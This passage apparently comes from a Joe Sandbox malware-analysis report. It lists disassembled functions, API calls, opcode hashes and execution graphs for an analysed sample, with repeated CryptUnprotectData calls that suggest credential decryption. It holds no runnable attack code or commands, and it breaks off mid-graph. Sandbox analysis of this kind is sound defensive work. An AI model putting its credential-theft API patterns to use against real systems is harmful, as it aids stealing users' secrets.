                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$ProcessSize_vswprintf_slstrlen
                                                              • String ID: z
                                                              • API String ID: 3730482531-1657960367
                                                              • Opcode ID: 4de46c3d6d40f6b2525f0d1cd369a4e90873315387c90635a080c4a7a073c664
                                                              • Instruction ID: 57fc21cf0bb922759f053d42a52e9d7c9f9fe73c82a33c14181335e9b12481bc
                                                              • Opcode Fuzzy Hash: 4de46c3d6d40f6b2525f0d1cd369a4e90873315387c90635a080c4a7a073c664
                                                              • Instruction Fuzzy Hash: F4312931A21206DBDB149F68C8C47DE77F1AFA4364F30452AE011DB150DF75CEA29BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00225A1F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: HX"$Y`"
                                                              • API String ID: 431132790-1307841931
                                                              • Opcode ID: ba56eb5478db0ebd6d6327fc5865333cccef4555bee38b9dd09cf26e9e168c73
                                                              • Instruction ID: 50e7cd75f81d3923d80c125f40cc35cf70d306e4577aeac8af066eef806d7b6d
                                                              • Opcode Fuzzy Hash: ba56eb5478db0ebd6d6327fc5865333cccef4555bee38b9dd09cf26e9e168c73
                                                              • Instruction Fuzzy Hash: 90117C70621BA1EFCB20DFA0C488B4ABBF8BF50304F54898CE4869B251C771E995CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002353BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00234D38: __getptd.LIBCMT ref: 00234D3E
                                                                • Part of subcall function 00234D38: __getptd.LIBCMT ref: 00234D4E
                                                              • __getptd.LIBCMT ref: 002353CB
                                                                • Part of subcall function 0022A753: __getptd_noexit.LIBCMT ref: 0022A756
                                                                • Part of subcall function 0022A753: __amsg_exit.LIBCMT ref: 0022A763
                                                              • __getptd.LIBCMT ref: 002353D9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                              • String ID: csm
                                                              • API String ID: 803148776-1018135373
                                                              • Opcode ID: bb629309e16acc5b64bc296b657b13c127ede069bedfd553f0c096afabd3e9ba
                                                              • Instruction ID: 8b2736913378010676b332697c3d725f872cd928145eda8b5f9b35f6860cb222
                                                              • Opcode Fuzzy Hash: bb629309e16acc5b64bc296b657b13c127ede069bedfd553f0c096afabd3e9ba
                                                              • Instruction Fuzzy Hash: 7F01D1B4821A268BCF3C9F60E4406ACF3B4AF10312FA4946DE58957661CB30D9F1CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00228054 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28synchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 0022805B
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00225279,?,?,?,00000000,00228585,?,00000000,?,?,000000CC,00220145), ref: 0022808E
                                                                • Part of subcall function 00227F50: SetEvent.KERNEL32(00000000,00228082,00000000,00225279,?,?,?,00000000,00228585,?,00000000,?,?,000000CC,00220145), ref: 00227F52
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: EventH_prolog3ObjectSingleWait
                                                              • String ID: I5#
                                                              • API String ID: 31040200-2153569433
                                                              • Opcode ID: af8530cb830b334a9bc02e4946616d8612a707a4b9b41ff0c0a934c30ecb9a25
                                                              • Instruction ID: fdd08b0adbc560a649142f158043fd5e5e36e9a0a77d2bf00d935c2be2cc3e22
                                                              • Opcode Fuzzy Hash: af8530cb830b334a9bc02e4946616d8612a707a4b9b41ff0c0a934c30ecb9a25
                                                              • Instruction Fuzzy Hash: 21F06270429666FBDB10EFA4D90A388FB60BF10351F248794E56463691CBB0AE75CBE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00218836 Relevance: 5.0, APIs: 4, Instructions: 30memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,00000000,7FFFFFFF,00000000,?,00218D82,00000000), ref: 00218852
                                                              • HeapReAlloc.KERNEL32(00000000,?,00218D82,00000000), ref: 00218859
                                                              • GetProcessHeap.KERNEL32(00000008,7FFFFFFF,00000000,?,00218D82,00000000), ref: 00218863
                                                              • HeapAlloc.KERNEL32(00000000,?,00218D82,00000000), ref: 0021886A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1617791916-0
                                                              • Opcode ID: 5fa76c6fcc6fdcb4508e7420019647dd61b2d16aada599631869d3e6b02a5b90
                                                              • Instruction ID: 6266364944368870344bb9325169945b6962d9a307473de3a74b71fcf93faa66
                                                              • Opcode Fuzzy Hash: 5fa76c6fcc6fdcb4508e7420019647dd61b2d16aada599631869d3e6b02a5b90
                                                              • Instruction Fuzzy Hash: 8DF03035110149EBC7114F65AC8CAE97ABAA7E13617758624F755C6050CE34C8E19764
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002187EB Relevance: 5.0, APIs: 4, Instructions: 28memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218802
                                                              • HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218809
                                                              • GetProcessHeap.KERNEL32(00000008,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218813
                                                              • HeapAlloc.KERNEL32(00000000,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 0021881A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1617791916-0
                                                              • Opcode ID: ecb133090555068b1a9556f8a41f278d115efc8a94cfec6454a4ec5582bc6751
                                                              • Instruction ID: d4fa0b2b10a04cf326b06eedf0c82e9194c571396ef17a5a021b2e3e98e07e68
                                                              • Opcode Fuzzy Hash: ecb133090555068b1a9556f8a41f278d115efc8a94cfec6454a4ec5582bc6751
                                                              • Instruction Fuzzy Hash: 5BE09275220045EBC7101F68BCCCAFA35ABA7E03217758628F366C3040DE348CA1C761
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:17.4%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:21
                                                              Total number of Limit Nodes:1
                                                              execution_graph 9418 7ffda159b176 9420 7ffda159b1c5 9418->9420 9419 7ffda159b29c CryptUnprotectData 9422 7ffda159b2e9 9419->9422 9420->9419 9421 7ffda159b233 9420->9421 9409 7ffda159bba8 9410 7ffda159bbb0 9409->9410 9412 7ffda159bbc1 9409->9412 9410->9412 9413 7ffda159ac10 9410->9413 9416 7ffda159ac29 9413->9416 9414 7ffda159ac2e 9414->9412 9415 7ffda159add0 LoadLibraryA 9417 7ffda159ae24 9415->9417 9416->9414 9416->9415 9417->9412 9405 7ffda159b25b 9406 7ffda159b281 CryptUnprotectData 9405->9406 9408 7ffda159b2e9 9406->9408 9423 7ffda159abc1 9427 7ffda159abdf 9423->9427 9424 7ffda159ac2e 9425 7ffda159add0 LoadLibraryA 9426 7ffda159ae24 9425->9426 9427->9424 9427->9425

                                                              Executed Functions

                                                              Function 00007FFDA159B176 Relevance: 1.7, APIs: 1, Instructions: 194encryptionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.978182552.00007FFDA1590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDA1590000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffda1590000_EQB4OREJ.jbxd
                                                              Similarity
                                                              • API ID: CryptDataUnprotect
                                                              • String ID:
                                                              • API String ID: 834300711-0
                                                              • Opcode ID: e048ae6f63121147f2131dcf2efd9c6acf93565761ab8877fabf9ab45d85b181
                                                              • Instruction ID: 5e29f1ae36e389b0b5ea56cc049a506563622b151e1203d615d6d50860a7b6c0
                                                              • Opcode Fuzzy Hash: e048ae6f63121147f2131dcf2efd9c6acf93565761ab8877fabf9ab45d85b181
                                                              • Instruction Fuzzy Hash: 95513C71A08A1C8FDB98DF18D845BE9B7F1FB98311F1082AAD40DE3255DE35A9858F81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFDA159B25B Relevance: 1.6, APIs: 1, Instructions: 116encryptionCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 521 7ffda159b25b-7ffda159b2e7 CryptUnprotectData 524 7ffda159b2e9 521->524 525 7ffda159b2ef-7ffda159b383 call 7ffda159b384 521->525 524->525
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.978182552.00007FFDA1590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDA1590000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffda1590000_EQB4OREJ.jbxd
                                                              Similarity
                                                              • API ID: CryptDataUnprotect
                                                              • String ID:
                                                              • API String ID: 834300711-0
                                                              • Opcode ID: b2dc26ae67257d0794b5ef5b73c488ffa6867c5f139ca48aa9563bd05408e05d
                                                              • Instruction ID: aa8f86d555abf184ce1932cf802e3a01e7aca18137b3bc7224cedae56b5a19e7
                                                              • Opcode Fuzzy Hash: b2dc26ae67257d0794b5ef5b73c488ffa6867c5f139ca48aa9563bd05408e05d
                                                              • Instruction Fuzzy Hash: 70315431918A1C8FEB94DF58D845BE9B3B1FF98311F1082AAD44D97256CB34A985CFC2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFDA159ABC1 Relevance: 1.8, APIs: 1, Instructions: 318libraryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.978182552.00007FFDA1590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDA1590000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffda1590000_EQB4OREJ.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: c5205e68091857a5836c6635e503cecabdf55b9480661d791708870f654000a5
                                                              • Instruction ID: 5bd729602742822acf793636b48e00c5509dbc1bbaced48c13414c5677da6c9b
                                                              • Opcode Fuzzy Hash: c5205e68091857a5836c6635e503cecabdf55b9480661d791708870f654000a5
                                                              • Instruction Fuzzy Hash: 5CA1E630A0DA894FDB59DB2888657F937F5EF45310F18417AE44DC73A3DE29E8428B92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:12.9%
                                                              Dynamic/Decrypted Code Coverage:5.4%
                                                              Signature Coverage:0.5%
                                                              Total number of Nodes:1659
                                                              Total number of Limit Nodes:55
                                                              execution_graph 75597 6c92efb2 75598 6c92efbe __EH_prolog3 75597->75598 75603 6c92a655 75598->75603 75600 6c92efc8 75627 6c94b477 74 API calls 2 library calls 75600->75627 75602 6c92f03b ctype 75604 6c92a661 __EH_prolog3 75603->75604 75628 6c92670b 75604->75628 75606 6c92a695 75636 6c926bbd 75606->75636 75608 6c92a6a5 75642 6c921b4a 75608->75642 75611 6c921b4a 67 API calls 75612 6c92a6cd 75611->75612 75646 6c923b22 75612->75646 75614 6c92a6fe 75653 6c926dc1 75614->75653 75618 6c92a758 75663 6c968eab 75618->75663 75621 6c968eab std::bad_exception::bad_exception 67 API calls 75622 6c92a7e3 75621->75622 75623 6c968eab std::bad_exception::bad_exception 67 API calls 75622->75623 75624 6c92a7fc 75623->75624 75625 6c968eab std::bad_exception::bad_exception 67 API calls 75624->75625 75626 6c92a815 ctype 75625->75626 75626->75600 75627->75602 75629 6c926717 __EH_prolog3 75628->75629 75630 6c968eab std::bad_exception::bad_exception 67 API calls 75629->75630 75631 6c92672b 75630->75631 75632 6c968eab std::bad_exception::bad_exception 67 API calls 75631->75632 75633 6c926740 75632->75633 75634 6c968eab std::bad_exception::bad_exception 67 API calls 75633->75634 75635 6c926761 ctype 75634->75635 75635->75606 75637 6c926bc9 __EH_prolog3 75636->75637 75638 6c968eab std::bad_exception::bad_exception 67 API calls 75637->75638 75639 6c926bdd 75638->75639 75640 6c968eab std::bad_exception::bad_exception 67 API calls 75639->75640 75641 6c926bf2 ctype 75640->75641 75641->75608 75643 6c921b58 75642->75643 75644 6c968eab std::bad_exception::bad_exception 67 API calls 75643->75644 75645 6c921b6c 75644->75645 75645->75611 75651 6c923b2e __EH_prolog3 75646->75651 75647 6c923b9e 75677 6c9678c8 RaiseException 75647->75677 75649 6c923b5a ctype 75649->75614 75650 6c923ba3 75651->75647 75651->75649 75669 6c95cc2c 75651->75669 75654 6c968eab std::bad_exception::bad_exception 67 API calls 75653->75654 75655 6c926dd2 75654->75655 75656 6c929746 75655->75656 75661 6c929752 __EH_prolog3 75656->75661 75657 6c92977e ctype 75657->75618 75658 6c9297c3 75747 6c9678c8 RaiseException 75658->75747 75660 6c9297c8 75661->75657 75661->75658 75662 6c95cc2c ctype 71 API calls 75661->75662 75662->75661 75666 6c968eb8 75663->75666 75664 6c92a7ca 75664->75621 75665 6c968ee5 75749 6c96b1f3 75665->75749 75666->75664 75666->75665 75748 6c9677cf KiUserExceptionDispatcher ctype std::bad_exception::bad_exception 75666->75748 75670 6c95cc38 __EH_prolog3 75669->75670 75678 6c96be92 75670->75678 75672 6c95cc46 75673 6c96be92 __recalloc 70 API calls 75672->75673 75676 6c95cc4d ctype 75672->75676 75674 6c95cc62 75673->75674 75675 6c968eab std::bad_exception::bad_exception 67 API calls 75674->75675 75674->75676 75675->75676 75676->75651 75677->75650 75679 6c96bea1 75678->75679 75680 6c96bebc 75678->75680 75679->75680 75681 6c96bead 75679->75681 75682 6c96bed1 75680->75682 75709 6c96e733 67 API calls __cftof2_l 75680->75709 75708 6c96bd29 66 API calls __getptd_noexit 75681->75708 75687 6c970f64 75682->75687 75686 6c96beb2 _memset 75686->75672 75688 6c970f6f 75687->75688 75689 6c970f7a 75687->75689 75710 6c96bfb3 75688->75710 75691 6c970f82 75689->75691 75699 6c970f8f 75689->75699 75727 6c96be0e 75691->75727 75694 6c970fc7 75734 6c971247 _DecodePointerInternal 75694->75734 75695 6c970f97 RtlReAllocateHeap 75695->75699 75705 6c970f8a _free 75695->75705 75697 6c970fcd 75735 6c96bd29 66 API calls __getptd_noexit 75697->75735 75698 6c970ff7 75737 6c96bd29 66 API calls __getptd_noexit 75698->75737 75699->75694 75699->75695 75699->75698 75704 6c970fdf 75699->75704 75733 6c971247 _DecodePointerInternal 75699->75733 75703 6c970ffc GetLastError 75703->75705 75736 6c96bd29 66 API calls __getptd_noexit 75704->75736 75705->75686 75707 6c970fe4 GetLastError 75707->75705 75708->75686 75709->75682 75711 6c96c030 75710->75711 75715 6c96bfc1 75710->75715 75744 6c971247 _DecodePointerInternal 75711->75744 75713 6c96c036 75745 6c96bd29 66 API calls __getptd_noexit 75713->75745 75714 6c96bfcc 75714->75715 75738 6c9711f5 66 API calls __NMSG_WRITE 75714->75738 75739 6c971041 66 API calls 6 library calls 75714->75739 75740 6c96d835 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 75714->75740 75715->75714 75718 6c96bfef RtlAllocateHeap 75715->75718 75721 6c96c01c 75715->75721 75725 6c96c01a 75715->75725 75741 6c971247 _DecodePointerInternal 75715->75741 75718->75715 75719 6c96c028 75718->75719 75719->75686 75742 6c96bd29 66 API calls __getptd_noexit 75721->75742 75743 6c96bd29 66 API calls __getptd_noexit 75725->75743 75728 6c96be19 HeapFree 75727->75728 75732 6c96be42 _free 75727->75732 75729 6c96be2e 75728->75729 75728->75732 75746 6c96bd29 66 API calls __getptd_noexit 75729->75746 75731 6c96be34 GetLastError 75731->75732 75732->75705 75733->75699 75734->75697 75735->75705 75736->75707 75737->75703 75738->75714 75739->75714 75741->75715 75742->75725 75743->75719 75744->75713 75745->75719 75746->75731 75747->75660 75748->75665 75752 6c96b204 _memset 75749->75752 75754 6c96b200 _memmove 75749->75754 75750 6c96b20a 75758 6c96bd29 66 API calls __getptd_noexit 75750->75758 75752->75750 75752->75754 75755 6c96b24f 75752->75755 75753 6c96b20f 75759 6c96ecf4 11 API calls __cftof2_l 75753->75759 75754->75664 75755->75754 75760 6c96bd29 66 API calls __getptd_noexit 75755->75760 75758->75753 75759->75754 75760->75753 75761 6c48ff39 GetWindowPlacement 75762 6c48ff87 75761->75762 75764 6c48ff8f 75761->75764 75767 6c4a76ee 66 API calls 2 library calls 75762->75767 75768 6c4a87c1 75764->75768 75766 6c48ffc5 75767->75764 75769 6c4a87cb IsDebuggerPresent 75768->75769 75770 6c4a87c9 75768->75770 75776 6c4af0b7 75769->75776 75770->75766 75773 6c4aaf10 SetUnhandledExceptionFilter UnhandledExceptionFilter 75774 6c4aaf2d __call_reportfault 75773->75774 75775 6c4aaf35 GetCurrentProcess TerminateProcess 75773->75775 75774->75775 75775->75766 75776->75773 75777 6c4a8789 75778 6c4a8799 75777->75778 75779 6c4a8794 75777->75779 75783 6c4a868e 75778->75783 75791 6c4aada3 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 75779->75791 75782 6c4a87a7 75784 6c4a869a type_info::_Type_info_dtor 75783->75784 75788 6c4a86e7 ___DllMainCRTStartup 75784->75788 75789 6c4a8737 type_info::_Type_info_dtor 75784->75789 75792 6c4a8525 75784->75792 75786 6c4a8717 75787 6c4a8525 __CRT_INIT@12 149 API calls 75786->75787 75786->75789 75787->75789 75788->75786 75788->75789 75790 6c4a8525 __CRT_INIT@12 149 API calls 75788->75790 75789->75782 75790->75786 75791->75778 75793 6c4a8531 type_info::_Type_info_dtor 75792->75793 75794 6c4a8539 75793->75794 75795 6c4a85b3 75793->75795 75844 6c4aa9e5 HeapCreate 75794->75844 75797 6c4a85b9 75795->75797 75798 6c4a8614 75795->75798 75803 6c4a85d7 75797->75803 75810 6c4a8542 type_info::_Type_info_dtor 75797->75810 75917 6c4aa2da 66 API calls _doexit 75797->75917 75799 6c4a8619 75798->75799 75800 6c4a8672 75798->75800 75922 6c4a9a2e TlsGetValue _DecodePointerInternal TlsSetValue 75799->75922 75800->75810 75931 6c4a9d33 79 API calls __freefls@4 75800->75931 75801 6c4a853e 75801->75810 75845 6c4a9da6 GetModuleHandleW 75801->75845 75808 6c4a85eb 75803->75808 75918 6c4aa55b 67 API calls ___free_lconv_num 75803->75918 75805 6c4a861e 75923 6c4a9f70 75805->75923 75921 6c4a85fe 70 API calls __mtterm 75808->75921 75810->75788 75812 6c4a854e __RTC_Initialize 75815 6c4a8552 75812->75815 75820 6c4a855e GetCommandLineA 75812->75820 75912 6c4aaa08 HeapDestroy 75815->75912 75816 6c4a85e1 75919 6c4a9a67 70 API calls ___free_lconv_num 75816->75919 75817 6c4a8636 _DecodePointerInternal 75824 6c4a864b 75817->75824 75870 6c4aa8f3 GetEnvironmentStringsW 75820->75870 75821 6c4a85e6 75920 6c4aaa08 HeapDestroy 75821->75920 75826 6c4a864f 75824->75826 75827 6c4a8666 75824->75827 75929 6c4a9aa9 66 API calls 4 library calls 75826->75929 75930 6c4a8e26 66 API calls 2 library calls 75827->75930 75832 6c4a8656 GetCurrentThreadId 75832->75810 75833 6c4a857c 75913 6c4a9a67 70 API calls ___free_lconv_num 75833->75913 75836 6c4a8588 75837 6c4a859c 75836->75837 75896 6c4aa5b3 75836->75896 75843 6c4a85a1 75837->75843 75916 6c4aa55b 67 API calls ___free_lconv_num 75837->75916 75840 6c4a85b1 75840->75833 75843->75810 75844->75801 75846 6c4a9dba 75845->75846 75847 6c4a9dc3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 75845->75847 75932 6c4a9a67 70 API calls ___free_lconv_num 75846->75932 75849 6c4a9e0d TlsAlloc 75847->75849 75852 6c4a9e5b TlsSetValue 75849->75852 75853 6c4a9f1c 75849->75853 75850 6c4a9dbf 75850->75812 75852->75853 75854 6c4a9e6c 75852->75854 75853->75812 75933 6c4aa07d _EncodePointerInternal _EncodePointerInternal __init_pointers _raise __initp_misc_winsig 75854->75933 75856 6c4a9e71 _EncodePointerInternal _EncodePointerInternal _EncodePointerInternal _EncodePointerInternal 75934 6c4ae872 InitializeCriticalSectionAndSpinCount 75856->75934 75858 6c4a9eb0 75859 6c4a9f17 75858->75859 75860 6c4a9eb4 _DecodePointerInternal 75858->75860 75936 6c4a9a67 70 API calls ___free_lconv_num 75859->75936 75862 6c4a9ec9 75860->75862 75862->75859 75863 6c4a9f70 __calloc_crt 66 API calls 75862->75863 75864 6c4a9edf 75863->75864 75864->75859 75865 6c4a9ee7 _DecodePointerInternal 75864->75865 75866 6c4a9ef8 75865->75866 75866->75859 75867 6c4a9efc 75866->75867 75935 6c4a9aa9 66 API calls 4 library calls 75867->75935 75869 6c4a9f04 GetCurrentThreadId 75869->75853 75871 6c4a856e 75870->75871 75873 6c4aa90f 75870->75873 75883 6c4aa311 GetStartupInfoW 75871->75883 75872 6c4aa924 WideCharToMultiByte 75874 6c4aa97c FreeEnvironmentStringsW 75872->75874 75875 6c4aa944 75872->75875 75873->75872 75873->75873 75874->75871 75937 6c4a9f26 75875->75937 75878 6c4aa952 WideCharToMultiByte 75879 6c4aa970 FreeEnvironmentStringsA 75878->75879 75880 6c4aa964 75878->75880 75879->75871 75943 6c4a8e26 66 API calls 2 library calls 75880->75943 75882 6c4aa96c 75882->75879 75884 6c4a9f70 __calloc_crt 66 API calls 75883->75884 75885 6c4aa32f 75884->75885 75886 6c4aa4a4 75885->75886 75888 6c4a9f70 __calloc_crt 66 API calls 75885->75888 75891 6c4a8578 75885->75891 75892 6c4aa424 75885->75892 75887 6c4aa4da GetStdHandle 75886->75887 75889 6c4aa53e SetHandleCount 75886->75889 75890 6c4aa4ec GetFileType 75886->75890 75895 6c4aa512 InitializeCriticalSectionAndSpinCount 75886->75895 75887->75886 75888->75885 75889->75891 75890->75886 75891->75833 75914 6c4aa833 95 API calls 3 library calls 75891->75914 75892->75886 75893 6c4aa45b InitializeCriticalSectionAndSpinCount 75892->75893 75894 6c4aa450 GetFileType 75892->75894 75893->75891 75893->75892 75894->75892 75894->75893 75895->75886 75895->75891 75897 6c4aa5bc 75896->75897 75899 6c4aa5c1 _strlen 75896->75899 75969 6c4ae318 94 API calls __setmbcp 75897->75969 75900 6c4a9f70 __calloc_crt 66 API calls 75899->75900 75903 6c4a8591 75899->75903 75906 6c4aa5f6 _strlen 75900->75906 75901 6c4aa645 75971 6c4a8e26 66 API calls 2 library calls 75901->75971 75903->75837 75915 6c4aa0de 77 API calls 4 library calls 75903->75915 75904 6c4a9f70 __calloc_crt 66 API calls 75904->75906 75905 6c4aa66b 75972 6c4a8e26 66 API calls 2 library calls 75905->75972 75906->75901 75906->75903 75906->75904 75906->75905 75909 6c4aa682 75906->75909 75970 6c4aede1 66 API calls 2 library calls 75906->75970 75973 6c4ab4b8 10 API calls __call_reportfault 75909->75973 75911 6c4aa68e 75912->75810 75913->75815 75914->75836 75915->75837 75916->75840 75917->75803 75918->75816 75919->75821 75920->75808 75921->75810 75922->75805 75925 6c4a9f79 75923->75925 75926 6c4a862a 75925->75926 75927 6c4a9f97 Sleep 75925->75927 75974 6c4ad6dc 75925->75974 75926->75810 75926->75817 75928 6c4a9fac 75927->75928 75928->75925 75928->75926 75929->75832 75930->75810 75931->75810 75932->75850 75933->75856 75934->75858 75935->75869 75936->75853 75939 6c4a9f2f 75937->75939 75940 6c4a9f65 75939->75940 75941 6c4a9f46 Sleep 75939->75941 75944 6c4a8fcb 75939->75944 75940->75874 75940->75878 75942 6c4a9f5b 75941->75942 75942->75939 75942->75940 75943->75882 75945 6c4a9048 75944->75945 75952 6c4a8fd9 75944->75952 75967 6c4ada46 _DecodePointerInternal 75945->75967 75947 6c4a904e 75968 6c4ab570 66 API calls __getptd_noexit 75947->75968 75950 6c4a9007 RtlAllocateHeap 75950->75952 75960 6c4a9040 75950->75960 75952->75950 75953 6c4a8fe4 75952->75953 75954 6c4a9034 75952->75954 75958 6c4a9032 75952->75958 75964 6c4ada46 _DecodePointerInternal 75952->75964 75953->75952 75961 6c4ad9f4 66 API calls 2 library calls 75953->75961 75962 6c4ad840 66 API calls 8 library calls 75953->75962 75963 6c4aa044 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 75953->75963 75965 6c4ab570 66 API calls __getptd_noexit 75954->75965 75966 6c4ab570 66 API calls __getptd_noexit 75958->75966 75960->75939 75961->75953 75962->75953 75964->75952 75965->75958 75966->75960 75967->75947 75968->75960 75969->75899 75970->75906 75971->75903 75972->75903 75973->75911 75975 6c4ad6e8 75974->75975 75981 6c4ad703 75974->75981 75976 6c4ad6f4 75975->75976 75975->75981 75983 6c4ab570 66 API calls __getptd_noexit 75976->75983 75978 6c4ad716 RtlAllocateHeap 75980 6c4ad73d 75978->75980 75978->75981 75979 6c4ad6f9 75979->75925 75980->75925 75981->75978 75981->75980 75984 6c4ada46 _DecodePointerInternal 75981->75984 75983->75979 75984->75981 75985 6c4a5dee 75986 6c4a5e11 75985->75986 75993 6c95d739 75986->75993 76000 6c49cbe6 75986->76000 76029 6c49d5a8 75986->76029 75987 6c4a5e7a SetWindowLongW 75989 6c4a5e6c 75987->75989 75988 6c4a5e34 75988->75987 75988->75989 75994 6c95d757 75993->75994 75995 6c95d746 GetTickCount 75993->75995 75997 6c95d771 75994->75997 75999 6c95d763 PostMessageW 75994->75999 76032 6c95fc46 111 API calls 2 library calls 75995->76032 75997->75988 75998 